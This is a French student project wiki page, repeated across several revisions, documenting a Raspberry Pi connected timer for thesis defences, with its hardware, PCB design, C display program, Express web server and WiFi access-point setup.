Le projet consiste donc à réaliser un timer connecté, disposant de 4 afficheurs 7 segments, dont deux feront face à l'étudiant et les deux autres au jury. Nous utilisons une raspberry pi 3, et nous basons ainsi notre timer sur le timer ARM de cette dernière. La raspberry fait également office de point d'accès permettant de délivrer une page web qui permet de configurer le timer.<br />
Le code controllant les afficheurs 7 segments sera réalisé en C.<br />
Le serveur web sera basé sur le framework express de node js.<br />
Le PCB sera réalisé sous Eagle.<br />
<br />
=Réalisation=<br />
<br />
==Matériel utilisé==<br />
<br />
* 1 Raspberry pi 3<br />
* 4 afficheurs 7 segments [http://www.kingbrightusa.com/images/catalog/SPEC/SA23-11SRWA.pdf SA23-11SRWA]<br />
* 16 transistors PNP [http://njsemi.com/datasheets/2N2894.pdf 2N2894]<br />
* 2 multiplexeurs [https://www.diodes.com/assets/Datasheets/74HCT595.pdf 74HCT595]<br />
* 16 résistances 56 Ohms<br />
* 16 résistances 1,2kOhms<br />
* 2 capacités 100nF<br />
* 1 capacité 10uF<br />
<br />
==Séance 1==<br />
<br />
===Recherche d'un sujet et clarification du cahier des charges===<br />
<br />
Après avoir passé du temps à rechercher un sujet, nous nous sommes orienté vers le sujet proposé par les encadrants, le timer connecté. Nous avons alors passé le reste de la séance à effectuer des recherches sur le matériel à utiliser ainsi qu'à définir les fonctionnalités que présentera notre timer. Les fonctionnalités retenues sont les suivantes : <br />
<br />
- Une application mobile permettra de contrôler le timer<br />
<br />
- Si l'utilisateur est un membre du jury, il pourra modifier le timer<br />
<br />
- Si l'utilisateur est une personne qui soutient, il ne pourra que consulter le timer<br />
<br />
- Un système de vote sera disponible à partir de l'application<br />
<br />
- Lorsqu'il restera 2 minutes sur le timer, le téléphone de l'utilisateur vibrera<br />
<br />
- Le timer sera double face afin qu'il soit visible par le jury et l'étudiant<br />
<br />
<br />
Finalement, nous avons été amené à revoir les fonctionnalités proposées au cours du projet par manque de temps. L'application a été remplacé par un site web. Le système de vote n'a pas été mis en place mais le membre du jury peut écrire des commentaires à la personne qui soutient à travers le site web. La fonctionnalité de vibration à été remplacée par un système de modification de la coloration du timer présent sur le site web à partir d'un certain temps restant.<br />
<br />
Pendant cette séance, nous avons également établit une liste du matériel que nous utiliserons : une Raspberry pi pour faire tourner le serveur accessible en wifi, un transformateur 230VAC vers 5VDC pour alimenter la Raspberry, des afficheurs 7-segments, et un driver de leds pour utiliser le moins de sortie possible.<br />
<br />
==Séance 2==<br />
<br />
===Structuration du projet===<br />
<br />
Lors de cette séance, des afficheurs 7-segments nous ont été fournis. Cependant, ils présentent la particularité d'être alimenté avec 12V. Les alimenter directement par la Raspberry qui elle peut fournir 5V n'est donc pas possible. <br />
<br />
Nous anons essayé de trouver une solution pour le contrôle des LED. Nous en avons retenu deux : <br />
<br />
- Utiliser des pilotes de LED [http://www.ti.com/lit/ds/symlink/tlc5947.pdf TLC5947] <br />
<br />
- Utiliser des transistors<br />
<br />
Nous avons alors décidé de partir sur les pilotes de LED pour plus de simplicité, ces derniers gérant eux mêmes le courant fournis aux LED. Après avoir pris cette décision, nous avons débuté la conception de la carte sous Eagle. Nous avons choisi ce logiciel car les toutes les footprint des composants utilisés sont disponibles sur le net.<br />
<br />
Nous avons également pu trouver des bibliothèques python pour utiliser le pilote de leds, et commencer le programme. Nous utiliserons deux pilotes de leds en cascade que nous contrôlerons avec 3 GPIO de la Raspberry. Nous avons également prévu de rajouter un ATMega328p qui pourra lui aussi contrôler les pilotes si on modifie la position de trois jumper. L'ATMega sera relié à la Raspberry en série pour qu'il puissent être programmé à travers elle.<br />
<br />
Pour alimenter le device, nous avons ajouté à notre liste de matériel un transformateur 230VAC vers 12VDC pour alimenter les leds ainsi qu'un régulateur 12VDC vers 5VDC pour alimenter la Raspberry (2A). Ensuite la Raspberry se chargera d'alimenter les pilote de leds et l'ATMega328p.<br />
<br />
==Séance 3==<br />
<br />
===Carte électronique===<br />
Durant cette séance nous avons finalisé le routage de la carte électronique suivant le circuit précédemment définit, et nous avons installé les librairies nécessaire à la programmation des pilotes de leds.<br />
<br />
Nous avons également testé les 7-segments qui nous ont été fournit, et nous nous sommes rendus compte qu'ils étaient à cathode commune et donc fonctionnaient différemment de ce qui était indiqué sur la datasheet. Cela pose un problème puisque les pilotes de LED dont nous disposons ne sont pas compatibles avec cette configuration. Nous avons donc du nous tourner vers l'autre solution pour le contrôle des leds, celle avec les transistors. Disposant de 4 afficheurs à 7segments (+ le point), les GPIO de la Raspberry ne sont pas assez nombreux, nous avons donc du utiliser des registre à décalage pour contrôler toutes les sorties.<br />
<br />
Nous avons alors passé cette séance à étudier les datasheet des différents composants et à établir un nouveau schéma pour la carte.<br />
<br />
Les afficheurs 7-segments de devant ayant à afficher la même chose que ceux de derrière, nous les connecterons entre eux afin réduire de moitié la quantité de composants à utiliser.<br />
<br />
===programme Raspberry===<br />
<br />
Durant cette séance, nous avons également pensé au soft qui sera embarqué dans la Raspberry. Nous avions décidé de configurer la Raspberry en accesspoint WiFi et de faire tourner un serveur web qui sera accessible lorsque l'utilisateur se connectera au WiFi de la Raspberry. En parallèle, un autre programme tournera sur la Raspberry et s'occupera du calcul du Timer et du contrôle des leds. Pour que le programme puisse communiquer avec le serveur nous avons plusieurs solutions à étudier : IPC, socket, écriture/lecture dans des fichiers.<br />
<br />
===Serveur web===<br />
<br />
Selon la définition Wikipédia, Express est un framework nodejs permettant de mettre en place des applications web. Il s'agit du framework le plus utilisé dans ce but sous l'environnement NodeJS.<br />
N'ayant jamais utilisé Express, nous avons dû nous renseigner sur son fonctionnement et nous documenter sur les possibilités du framework. <br />
Express est basé sur une architecture typique MVC (Model-View-Controller). Nous pouvons définir des middlewares permettant de capturer les requêtes, de réaliser un traitement préalable, puis de renvoyer la page. Pour cela, il suffit de définir des routes, qui définirons les différentes requêtes HTTP possibles.<br />
<br />
{| class="wikitable"<br />
! style="text-align: center; font-weight:bold;" | Route<br />
! style="text-align: center; font-weight:bold;" | Méthode<br />
! style="text-align: center; font-weight:bold;" | Description<br />
|-<br />
| /<br />
| GET<br />
| Permet de réaliser un choix entre l'interface enseignant et étudiant<br />
|-<br />
| /prof<br />
| GET<br />
| Permet de parametrer le timer, en informant le nom du créateur du timer,<br />
la durée de celui-ci en minutes, et l'étudiant en question.<br />
|-<br />
| /prof/timer<br />
| GET<br />
| Si un timer est configuré, affiche ce dernier, ainsi qu'un formulaire permettant <br />
d'envoyer un commentaire.<br />
|-<br />
| /prof/timer<br />
| POST<br />
| Permet de traiter soit un nouveau commentaire, soit de lancer le timer<br />
|-<br />
| /etudiant<br />
| GET<br />
| Permet d'afficher les commentaires et un timer approximatif, qui vire au rouge lorsque<br />
le temps devient critique (<2 minutes)<br />
|}<br />
<br />
Les routes étant fixés et définies, nous pouvons passer à la réalisation.<br />
<br />
==Séance 4==<br />
<br />
===Carte électronique===<br />
<br />
Lors de cette séance, nous avons pu terminer la carte. Le schematic final est le suivant : <br />
<br />
<br />
[[Fichier:SchematicP4IOT.png|center|1000px]]<br />
<br />
<br />
Le PCB est le suivant : <br />
<br />
[[Fichier:RoutageP4IOT.png|center|1000px]]<br />
<br />
<br />
<br />
===Serveur web===<br />
Afin de pouvoir communiquer avec le programme principal manipulant le véritable timer, il est nécessaire d'implémenter une sorte de communication inter-processus. Le choix est porté sur la mise en place d'une liaison sockets UDP, qui sont plus pratique dans notre cas que des sockets basés sur TCP.<br />
Ainsi, le module 'dgram' (pour datagram, de UDP datagram socket), permet d'écouter pour un 'datagram' sur un port particulier, ou simplement de broadcaster un message. <br />
Le serveur web permettra ainsi d'envoyer la valeur du timer en secondes, tandis que le programme principal en C écoutera sur un port spécifié, et lancera le timer dès la réception de la valeur. <br />
Le code permettant l'envoi d'un message par socket UDP est simple à réaliser :<br />
<br />
[[Fichier:Dgramtimer.png|600px]]<br />
<br />
Nous avons décidés que le timer affiché sur les pages web est simplement à titre indicatif, soit, il ne représente pas réellement le véritable timer, dont la valeur est affiché sur les afficheurs 7 segments. Ce choix à été fait en raison du fait que nodejs et express ne tournent uniquement que sur un thread et ne permettent pas d'écouter sur un port et de rafraichir la page dès une réception.<br />
Ainsi, dès le choix de la valeur du timer, nous sauvegardons la timestamp de fin de celui-ci et lançons le timer pour un compte à rebours vers cette valeur.<br />
<br />
Les commentaires quant à eux sont enregistrés dans un fichier sous format JSON, et dans le cas d'une requête GET, une lecture de ce fichier est réalisée et les commentaires affichés, tandis que dans le cas d'une requête POST, le fichier est réécris en mémoire avec le nouveau commentaire.<br />
L'identifiant d'un professeur commentant est défini sur le formulaire de choix du timer en ne spécifiant que le champ identifiant. La valeur de ce dernier est enregistré dans un cookie de navigateur.<br />
Les informations relatives au timer, au nom de l'étudiant et au créateur du timer sont enregistrés dans un autre fichier JSON et récupérés au besoin.<br />
<br />
[[Fichier:Entreeiot.png|300px]]<br />
[[Fichier:CHOIXIOT.png|300px]]<br />
[[Fichier:TimerProf.png|300px]]<br />
<br />
==Séance 5==<br />
<br />
===Gravure de la carte électronique===<br />
<br />
Après avoir récupéré la carte gravée, nous nous sommes rendu compte qu'il y avait eu un problème de perçage. En effet, certains trous non présents sur le schéma de routage se trouvaient la carte, d'autres n'étaient pas du tout présent ou alors pas à la bonne place. Pourtant, nous n’apercevions aucun problème lors de la vérification des fichiers gerber avec http://www.gerber-viewer.com/. Nous avons alors passé pas mal de temps à rechercher la cause du problème avec Monsieur Flamen. Finalement, le problème provenait de la génération des fichiers gerber. Après avoir corrigé le problème, la carte a pu être regravée correctement.<br />
<br />
===Configuration de la raspberry pi===<br />
<br />
Nous configurons la raspberry afin d'agir en tant que point d'accès afin de pouvoir accéder à l'interface web : <br />
<br />
Nous installons tout d'abord les paquets dnsmasq et hostapd, permettant de configurer le point d'accès et fournir le service DNS :<br />
$ sudo apt-get install dnsmasq hostapd<br />
<br />
Nous modifions le fichier de configuration de dhcpcd en ajoutant : <br />
interface wlan0<br />
static ip_address=192.168.4.1/24<br />
nohook wpa_supplicant<br />
<br />
Nous relançons ensuite le service dhcpcd.<br />
<br />
Nous modifions ensuite le fichier de configuration de dnsmasq, qui va définir la plage d'IPs à attribuer : <br />
interface=wlan0<br />
dhcp-range=192.168.4.2,192.168.4.20,255.255.255.0,24h<br />
<br />
Enfin, nous écrivons la configuration de notre point d'accès dans un fichier de configuration de hostapd : <br />
<br />
interface=wlan0<br />
driver=nl80211<br />
ssid=TimerIOT<br />
hw_mode=g<br />
channel=7<br />
wmm_enabled=0<br />
macaddr_acl=0<br />
auth_algs=1<br />
ignore_broadcast_ssid=0<br />
wpa=2<br />
wpa_passphrase=timeriot<br />
wpa_key_mgmt=WPA-PSK<br />
wpa_pairwise=TKIP<br />
rsn_pairwise=CCMP<br />
<br />
Enfin, nous lançons les processus hostapd et dnsmasq : <br />
$ sudo systemctl start hostapd<br />
$ sudo systemctl start dnsmasq<br />
<br />
Nous rebootons enfin la raspberry. La page web est ainsi accessible en se connectant au point d'accès et en tapant http://192.168.4.1:3000 dans le navigateur.<br />
<br />
===Programme Raspberry===<br />
<br />
Pendant cette séance nous avons également finalisé le programme de la Raspberry et installé les librairies permettant d'utiliser le registre à décalage et les GPIO <code>WiringPi</code>.<br />
<br />
Dans ce programme, après les initialisations, une socket UDP est créée pour recevoir la valeur initiale du Timer depuis le serveur web. La socket est par la suite fermée et le message reçu converti en entier. Puis deux threads sont lancés : Le premier qui permet le calcul du Timer en se basant sur la valeur initiale et en utilisant l'horloge physique de la Raspberry (fonction : <code>clock_gettime(CLOCK_REALTIME, &<timespec>);</code>), le deuxième thread contrôle les 7-segements après l'avoir parsé en unités et dizaines. Les deux threads communiquent entre eux avec un pipe et un système de verrou pour synchroniser l'envoi et la réception. Finalement les threads et le pipe sont fermés proprement.<br />
<br />
Ce programme affiche les valeurs supérieures à 99 secondes en minutes et celle inférieures à 99 secondes en seconde. Le programme et disponible sur le git : https://github.com/ael-mess/raspberry-pi-timer/blob/master/pi.c<br />
<br />
==Séance 6==<br />
<br />
Durant cette séance nous avons combiné les deux programmes, et automatisé leur lancement. Nous avons créé un script shell qui lance le serveur web, puis dans une boucle infinie lance le Timer puis supprime les fichiers .json du controller du serveur web à la fin de chaque timer. Ce script a été mis dans <code>/etc/.rclocal</code> de la Raspberry en tache de fond, pour qu'il puissent être lancé à chaque allumage de la Raspberry même avant le loging.<br />
<br />
===Test===<br />
<br />
Pendant cette dernière séance nous avons également soudé une partie de nos composants pour faire des tests. Le test de la partie électronique à révélé un comportement anormal du circuit : des segments de leds restent allumés sans qu'aucune tension sur la base des transistors ne soit appliquée. Nous nous sommes assurés de corriger toutes les erreurs de soudure/contact mais nous n'avons pas pu trouver la source du problème. L’hypothèse qui a été émise est que la carte n'aillant pas été nettoyé avant la soudure, le contact n'était pas pareil pour tous les composants, et que donc le potentiel entre deux points reliés n'était pas identique (M.Thierry Flamen).<br />
<br />
La partie logiciel elle, marche très bien sans aucun comportement anormal.<br />
<br />
===Amélioration si plus temps===<br />
<br />
- prendre plus de temps pour réaliser et tester la partie hardware.<br />
<br />
- utiliser la socket pour l'envoie de chaque valeur du timer et non que pour la valeur initial. (parce que le timer calculé par le serveur web utilise la date de la Raspberry et n'est pas précis)<br />
<br />
==Flyer==<br />
[[Fichier:Flyer timer iot.jpeg|800px|center]]<br />
<br />
=Documents rendus=<br />
<br />
* [[Fichier:Timer IOT Web.zip]]</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=P4_IOT_2018&diff=49613P4 IOT 20182019-01-26T18:28:57Z<p>Mcreteur : /* Programme Raspberry */</p>
<hr />
<div>=Présentation du sujet =<br />
<br />
==Contexte==<br />
<br />
Prenons le cas d'une soutenance de quatrième année, strictement limitée en temps. On ne voudrait surtout pas rater cette dernière et ne pas avoir l'occasion de passer en revue l'ensemble de ses slides ! Le jury ne souhaite cependant pas faire office d'arbitre ou d'interrompre la personne soutenant. Ainsi, un timer connecté permettant d'indiquer le temps restant aux deux parties est placé sur la table. Ce timer fait également office de point d'accès et permet de se connecter à une page web ou les enseignants peuvent noter des commentaires que l'étudiant peut observer en temps réel.<br />
<br />
==Description du projet==<br />
<br />
Le projet consiste donc à réaliser un timer connecté, disposant de 4 afficheurs 7 segments, dont deux feront face à l'étudiant et les deux autres au jury. Nous utilisons une raspberry pi 3, et nous basons ainsi notre timer sur le timer ARM de cette dernière. La raspberry fait également office de point d'accès permettant de délivrer une page web qui permet de configurer le timer.<br />
Le code controllant les afficheurs 7 segments sera réalisé en C.<br />
Le serveur web sera basé sur le framework express de node js.<br />
Le PCB sera réalisé sous Eagle.<br />
<br />
=Réalisation=<br />
<br />
==Matériel utilisé==<br />
<br />
* 1 Raspberry pi 3<br />
* 4 afficheurs 7 segments [http://www.kingbrightusa.com/images/catalog/SPEC/SA23-11SRWA.pdf SA23-11SRWA]<br />
* 16 transistors PNP [http://njsemi.com/datasheets/2N2894.pdf 2N2894]<br />
* 2 multiplexeurs [https://www.diodes.com/assets/Datasheets/74HCT595.pdf 74HCT595]<br />
* 16 résistances 56 Ohms<br />
* 16 résistances 1,2kOhms<br />
* 2 capacités 100nF<br />
* 1 capacité 10uF<br />
<br />
==Séance 1==<br />
<br />
===Recherche d'un sujet et clarification du cahier des charges===<br />
<br />
Après avoir passé du temps à rechercher un sujet, nous nous sommes orienté vers le sujet proposé par les encadrants, le timer connecté. Nous avons alors passé le reste de la séance à effectuer des recherches sur le matériel à utiliser ainsi qu'à définir les fonctionnalités que présentera notre timer. Les fonctionnalités retenues sont les suivantes : <br />
<br />
- Une application mobile permettra de contrôler le timer<br />
<br />
- Si l'utilisateur est un membre du jury, il pourra modifier le timer<br />
<br />
- Si l'utilisateur est une personne qui soutient, il ne pourra que consulter le timer<br />
<br />
- Un système de vote sera disponible à partir de l'application<br />
<br />
- Lorsqu'il restera 2 minutes sur le timer, le téléphone de l'utilisateur vibrera<br />
<br />
- Le timer sera double face afin qu'il soit visible par le jury et l'étudiant<br />
<br />
<br />
Finalement, nous avons été amené à revoir les fonctionnalités proposées au cours du projet par manque de temps. L'application a été remplacé par un site web. Le système de vote n'a pas été mis en place mais le membre du jury peut écrire des commentaires à la personne qui soutient à travers le site web. La fonctionnalité de vibration à été remplacée par un système de modification de la coloration du timer présent sur le site web à partir d'un certain temps restant.<br />
<br />
Pendant cette séance, nous avons également établit une liste du matériel que nous utiliserons : une Raspberry pi pour faire tourner le serveur accessible en wifi, un transformateur 230VAC vers 5VDC pour alimenter la Raspberry, des afficheurs 7-segments, et un driver de leds pour utiliser le moins de sortie possible.<br />
<br />
==Séance 2==<br />
<br />
===Structuration du projet===<br />
<br />
Lors de cette séance, des afficheurs 7-segments nous ont été fournis. Cependant, ils présentent la particularité d'être alimenté avec 12V. Les alimenter directement par la Raspberry qui elle peut fournir 5V n'est donc pas possible. <br />
<br />
Nous anons essayé de trouver une solution pour le contrôle des LED. Nous en avons retenu deux : <br />
<br />
- Utiliser des pilotes de LED [http://www.ti.com/lit/ds/symlink/tlc5947.pdf TLC5947] <br />
<br />
- Utiliser des transistors<br />
<br />
Nous avons alors décidé de partir sur les pilotes de LED pour plus de simplicité, ces derniers gérant eux mêmes le courant fournis aux LED. Après avoir pris cette décision, nous avons débuté la conception de la carte sous Eagle. Nous avons choisi ce logiciel car les toutes les footprint des composants utilisés sont disponibles sur le net.<br />
<br />
Nous avons également pu trouver des bibliothèques python pour utiliser le pilote de leds, et commencer le programme. Nous utiliserons deux pilotes de leds en cascade que nous contrôlerons avec 3 GPIO de la Raspberry. Nous avons également prévu de rajouter un ATMega328p qui pourra lui aussi contrôler les pilotes si on modifie la position de trois jumper. L'ATMega sera relié à la Raspberry en série pour qu'il puissent être programmé à travers elle.<br />
<br />
Pour alimenter le device, nous avons ajouté à notre liste de matériel un transformateur 230VAC vers 12VDC pour alimenter les leds ainsi qu'un régulateur 12VDC vers 5VDC pour alimenter la Raspberry (2A). Ensuite la Raspberry se chargera d'alimenter les pilote de leds et l'ATMega328p.<br />
<br />
==Séance 3==<br />
<br />
===Carte électronique===<br />
Durant cette séance nous avons finalisé le routage de la carte électronique suivant le circuit précédemment définit, et nous avons installé les librairies nécessaire à la programmation des pilotes de leds.<br />
<br />
Nous avons également testé les 7-segments qui nous ont été fournit, et nous nous sommes rendus compte qu'ils étaient à cathode commune et donc fonctionnaient différemment de ce qui était indiqué sur la datasheet. Cela pose un problème puisque les pilotes de LED dont nous disposons ne sont pas compatibles avec cette configuration. Nous avons donc du nous tourner vers l'autre solution pour le contrôle des leds, celle avec les transistors. Disposant de 4 afficheurs à 7segments (+ le point), les GPIO de la Raspberry ne sont pas assez nombreux, nous avons donc du utiliser des registre à décalage pour contrôler toutes les sorties.<br />
<br />
Nous avons alors passé cette séance à étudier les datasheet des différents composants et à établir un nouveau schéma pour la carte.<br />
<br />
Les afficheurs 7-segments de devant ayant à afficher la même chose que ceux de derrière, nous les connecterons entre eux afin réduire de moitié la quantité de composants à utiliser.<br />
<br />
===programme Raspberry===<br />
<br />
Durant cette séance, nous avons également pensé au soft qui sera embarqué dans la Raspberry. Nous avions décidé de configurer la Raspberry en accesspoint WiFi et de faire tourner un serveur web qui sera accessible lorsque l'utilisateur se connectera au WiFi de la Raspberry. En parallèle, un autre programme tournera sur la Raspberry et s'occupera du calcul du Timer et du contrôle des leds. Pour que le programme puisse communiquer avec le serveur nous avons plusieurs solutions à étudier : IPC, socket, écriture/lecture dans des fichiers.<br />
<br />
===Serveur web===<br />
<br />
Selon la définition Wikipédia, Express est un framework nodejs permettant de mettre en place des applications web. Il s'agit du framework le plus utilisé dans ce but sous l'environnement NodeJS.<br />
N'ayant jamais utilisé Express, nous avons dû nous renseigner sur son fonctionnement et nous documenter sur les possibilités du framework. <br />
Express est basé sur une architecture typique MVC (Model-View-Controller). Nous pouvons définir des middlewares permettant de capturer les requêtes, de réaliser un traitement préalable, puis de renvoyer la page. Pour cela, il suffit de définir des routes, qui définirons les différentes requêtes HTTP possibles.<br />
<br />
{| class="wikitable"<br />
! style="text-align: center; font-weight:bold;" | Route<br />
! style="text-align: center; font-weight:bold;" | Méthode<br />
! style="text-align: center; font-weight:bold;" | Description<br />
|-<br />
| /<br />
| GET<br />
| Permet de réaliser un choix entre l'interface enseignant et étudiant<br />
|-<br />
| /prof<br />
| GET<br />
| Permet de parametrer le timer, en informant le nom du créateur du timer,<br />
la durée de celui-ci en minutes, et l'étudiant en question.<br />
|-<br />
| /prof/timer<br />
| GET<br />
| Si un timer est configuré, affiche ce dernier, ainsi qu'un formulaire permettant <br />
d'envoyer un commentaire.<br />
|-<br />
| /prof/timer<br />
| POST<br />
| Permet de traiter soit un nouveau commentaire, soit de lancer le timer<br />
|-<br />
| /etudiant<br />
| GET<br />
| Permet d'afficher les commentaires et un timer approximatif, qui vire au rouge lorsque<br />
le temps devient critique (<2 minutes)<br />
|}<br />
<br />
Les routes étant fixés et définies, nous pouvons passer à la réalisation.<br />
<br />
==Séance 4==<br />
<br />
===Carte électronique===<br />
<br />
Lors de cette séance, nous avons pu terminer la carte. Le schematic final est le suivant : <br />
<br />
<br />
[[Fichier:SchematicP4IOT.png|center|1000px]]<br />
<br />
<br />
Le PCB est le suivant : <br />
<br />
[[Fichier:RoutageP4IOT.png|center|1000px]]<br />
<br />
<br />
<br />
===Serveur web===<br />
Afin de pouvoir communiquer avec le programme principal manipulant le véritable timer, il est nécessaire d'implémenter une sorte de communication inter-processus. Le choix est porté sur la mise en place d'une liaison sockets UDP, qui sont plus pratique dans notre cas que des sockets basés sur TCP.<br />
Ainsi, le module 'dgram' (pour datagram, de UDP datagram socket), permet d'écouter pour un 'datagram' sur un port particulier, ou simplement de broadcaster un message. <br />
Le serveur web permettra ainsi d'envoyer la valeur du timer en secondes, tandis que le programme principal en C écoutera sur un port spécifié, et lancera le timer dès la réception de la valeur. <br />
Le code permettant l'envoi d'un message par socket UDP est simple à réaliser :<br />
<br />
[[Fichier:Dgramtimer.png|600px]]<br />
<br />
Nous avons décidés que le timer affiché sur les pages web est simplement à titre indicatif, soit, il ne représente pas réellement le véritable timer, dont la valeur est affiché sur les afficheurs 7 segments. Ce choix à été fait en raison du fait que nodejs et express ne tournent uniquement que sur un thread et ne permettent pas d'écouter sur un port et de rafraichir la page dès une réception.<br />
Ainsi, dès le choix de la valeur du timer, nous sauvegardons la timestamp de fin de celui-ci et lançons le timer pour un compte à rebours vers cette valeur.<br />
<br />
Les commentaires quant à eux sont enregistrés dans un fichier sous format JSON, et dans le cas d'une requête GET, une lecture de ce fichier est réalisée et les commentaires affichés, tandis que dans le cas d'une requête POST, le fichier est réécris en mémoire avec le nouveau commentaire.<br />
L'identifiant d'un professeur commentant est défini sur le formulaire de choix du timer en ne spécifiant que le champ identifiant. La valeur de ce dernier est enregistré dans un cookie de navigateur.<br />
Les informations relatives au timer, au nom de l'étudiant et au créateur du timer sont enregistrés dans un autre fichier JSON et récupérés au besoin.<br />
<br />
[[Fichier:Entreeiot.png|300px]]<br />
[[Fichier:CHOIXIOT.png|300px]]<br />
[[Fichier:TimerProf.png|300px]]<br />
<br />
==Séance 5==<br />
<br />
===Gravure de la carte électronique===<br />
<br />
Après avoir récupéré la carte gravée, nous nous sommes rendu compte qu'il y avait eu un problème de perçage. En effet, certains trous non présents sur le schéma de routage se trouvaient la carte, d'autres n'étaient pas du tout présent ou alors pas à la bonne place. Pourtant, nous n’apercevions aucun problème lors de la vérification des fichiers gerber avec http://www.gerber-viewer.com/. Nous avons alors passé pas mal de temps à rechercher la cause du problème avec Monsieur Flamen. Finalement, le problème provenait de la génération des fichiers gerber. Après avoir corrigé le problème, la carte a pu être regravée correctement.<br />
<br />
===Configuration de la raspberry pi===<br />
<br />
Nous configurons la raspberry afin d'agir en tant que point d'accès afin de pouvoir accéder à l'interface web : <br />
<br />
Nous installons tout d'abord les paquets dnsmasq et hostapd, permettant de configurer le point d'accès et fournir le service DNS :<br />
$ sudo apt-get install dnsmasq hostapd<br />
<br />
Nous modifions le fichier de configuration de dhcpcd en ajoutant : <br />
interface wlan0<br />
static ip_address=192.168.4.1/24<br />
nohook wpa_supplicant<br />
<br />
Nous relançons ensuite le service dhcpcd.<br />
<br />
Nous modifions ensuite le fichier de configuration de dnsmasq, qui va définir la plage d'IPs à attribuer : <br />
interface=wlan0<br />
dhcp-range=192.168.4.2,192.168.4.20,255.255.255.0,24h<br />
<br />
Enfin, nous écrivons la configuration de notre point d'accès dans un fichier de configuration de hostapd : <br />
<br />
interface=wlan0<br />
driver=nl80211<br />
ssid=TimerIOT<br />
hw_mode=g<br />
channel=7<br />
wmm_enabled=0<br />
macaddr_acl=0<br />
auth_algs=1<br />
ignore_broadcast_ssid=0<br />
wpa=2<br />
wpa_passphrase=timeriot<br />
wpa_key_mgmt=WPA-PSK<br />
wpa_pairwise=TKIP<br />
rsn_pairwise=CCMP<br />
<br />
Enfin, nous lançons les processus hostapd et dnsmasq : <br />
$ sudo systemctl start hostapd<br />
$ sudo systemctl start dnsmasq<br />
<br />
Nous rebootons enfin la raspberry. La page web est ainsi accessible en se connectant au point d'accès et en tapant http://192.168.4.1:3000 dans le navigateur.<br />
<br />
===Programme Raspberry===<br />
<br />
Pendant cette séance nous avons également finalisé le programme de la Raspberry et installé les librairies permettant d'utiliser le registre à décalage et les GPIO <code>WiringPi</code>.<br />
<br />
Dans ce programme, après les initialisations, une socket UDP est créée pour recevoir la valeur initiale du Timer depuis le serveur web. La socket est par la suite fermée et le message reçu converti en entier. Puis deux threads sont lancés : Le premier qui permet le calcul du Timer en se basant sur la valeur initiale et en utilisant l'horloge physique de la Raspberry (fonction : <code>clock_gettime(CLOCK_REALTIME, &<timespec>);</code>), le deuxième thread contrôle les 7-segements après l'avoir parsé en unités et dizaines. Les deux threads communiquent entre eux avec un pipe et un système de verrou pour synchroniser l'envoi et la réception. Finalement les threads et le pipe sont fermés proprement.<br />
<br />
Ce programme affiche les valeurs supérieures à 99 secondes en minutes et celle inférieures à 99 secondes en seconde. Le programme et disponible sur le git : https://github.com/ael-mess/raspberry-pi-timer/blob/master/pi.c<br />
<br />
==Séance 6==<br />
<br />
Durant cette séance nous avons combiner les deux programmes, et automatiser leurs lancement. Nous avons crée un script shell qui lance le serveur web, puis dans une boucle infini lance le Timer puis supprime les fichiers .json du controllers du serveur web à la fin de chaque timer. Ce script à était mis dans <code>/etc/.rclocal</code> de la Raspberry en tache de fond, pour qu'il puissent être lancer à chaque allumage de la Raspberry même avant le loging.<br />
<br />
===Test===<br />
<br />
Pendant cette dernière séance nous avons également souder une partie de nos composants pour faire des tests. Le test de la partie électronique à révéler un comportement anormal du circuit : des segments de leds restent allumer sans que aucune tension sur la base des transistors ne soit appliquée. Nous nous sommes assuré de corriger toutes les erreurs de soudure/contact mais nous n'avions pas pu trouver la source du problème. L’hypothèse qui ont était émise est que la carte n'aillant pas était nettoyé avant la soudure, le contact n'était pas pareil pour tous les composants, et du coup le potentiel entre deux points reliées n'était pas identique (M.Thierry Flamen).<br />
<br />
La partie logiciel elle, marche très bien sans aucun comportement anormal.<br />
<br />
===Amélioration si plus temps===<br />
<br />
- prendre plus de temps pour réaliser et tester la partie hardware.<br />
<br />
- utiliser la socket pour l'envoie de chaque valeur du timer et non que pour la valeur initial. (parce que le timer calculer par le serveur web utilise la date de la Raspberry et n'est pas précis)<br />
<br />
==Flyer==<br />
[[Fichier:Flyer timer iot.jpeg|800px|center]]<br />
<br />
=Documents rendus=</div>Mcreteurhttps://wiki-ima.plil.fr/mediawiki//index.php?title=P4_IOT_2018&diff=49612P4 IOT 20182019-01-26T18:22:12Z<p>Mcreteur : </p>
<hr />
<div>=Présentation du sujet =<br />
<br />
==Contexte==<br />
<br />
Prenons le cas d'une soutenance de quatrième année, strictement limitée en temps. On ne voudrait surtout pas rater cette dernière et ne pas avoir l'occasion de passer en revue l'ensemble de ses slides ! Le jury ne souhaite cependant pas faire office d'arbitre ou d'interrompre la personne soutenant. Ainsi, un timer connecté permettant d'indiquer le temps restant aux deux parties est placé sur la table. Ce timer fait également office de point d'accès et permet de se connecter à une page web ou les enseignants peuvent noter des commentaires que l'étudiant peut observer en temps réel.<br />
<br />
==Description du projet==<br />
<br />
Le projet consiste donc à réaliser un timer connecté, disposant de 4 afficheurs 7 segments, dont deux feront face à l'étudiant et les deux autres au jury. Nous utilisons une raspberry pi 3, et nous basons ainsi notre timer sur le timer ARM de cette dernière. La raspberry fait également office de point d'accès permettant de délivrer une page web qui permet de configurer le timer.<br />
Le code controllant les afficheurs 7 segments sera réalisé en C.<br />
Le serveur web sera basé sur le framework express de node js.<br />
Le PCB sera réalisé sous Eagle.<br />
<br />
=Réalisation=<br />
<br />
==Matériel utilisé==<br />
<br />
* 1 Raspberry pi 3<br />
* 4 afficheurs 7 segments [http://www.kingbrightusa.com/images/catalog/SPEC/SA23-11SRWA.pdf SA23-11SRWA]<br />
* 16 transistors PNP [http://njsemi.com/datasheets/2N2894.pdf 2N2894]<br />
* 2 multiplexeurs [https://www.diodes.com/assets/Datasheets/74HCT595.pdf 74HCT595]<br />
* 16 résistances 56 Ohms<br />
* 16 résistances 1,2kOhms<br />
* 2 capacités 100nF<br />
* 1 capacité 10uF<br />
<br />
==Séance 1==<br />
<br />
===Recherche d'un sujet et clarification du cahier des charges===<br />
<br />
Après avoir passé du temps à rechercher un sujet, nous nous sommes orienté vers le sujet proposé par les encadrants, le timer connecté. Nous avons alors passé le reste de la séance à effectuer des recherches sur le matériel à utiliser ainsi qu'à définir les fonctionnalités que présentera notre timer. Les fonctionnalités retenues sont les suivantes : <br />
<br />
- Une application mobile permettra de contrôler le timer<br />
<br />
- Si l'utilisateur est un membre du jury, il pourra modifier le timer<br />
<br />
- Si l'utilisateur est une personne qui soutient, il ne pourra que consulter le timer<br />
<br />
